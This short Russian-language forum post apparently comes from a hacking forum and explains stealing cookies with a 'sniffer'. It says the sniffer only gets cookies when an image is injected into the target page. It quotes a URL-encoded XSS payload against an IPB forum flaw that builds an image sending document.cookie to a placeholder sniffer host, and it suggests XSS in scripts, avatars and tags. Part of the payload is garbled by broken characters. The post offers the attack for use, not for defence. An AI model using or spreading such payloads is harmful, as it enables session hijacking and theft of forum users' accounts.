Если просто тупо ссылку вставить, то нет. Если ты дашь ссылку на снифер, то это уже другой сервак будет... Снифер это по сути картинка, но если ее кто-то глянул, то отдал куки. Так вот, если ты обратишься к сниферунапямую, то куков никаих не будет. А если ты найдешь метод как внедрить свою картинку в страницу, да еще и скажешь куки туда прицепить, то другое дело!

Возьмем например уязвимость ИПБ
document.cookie%3Bimg=new%20Image()%3Bimg.src=%27� �НИФЕР%3F%27%2Bx/*.jpg*///.gif Видишь, ты создаешь картинку, которая шлет куки на снифер.
Чтобы куки украсть надо юзать различные XSS. Они могут быть везде... В скриптах всяких, в аватарах, в тэгах...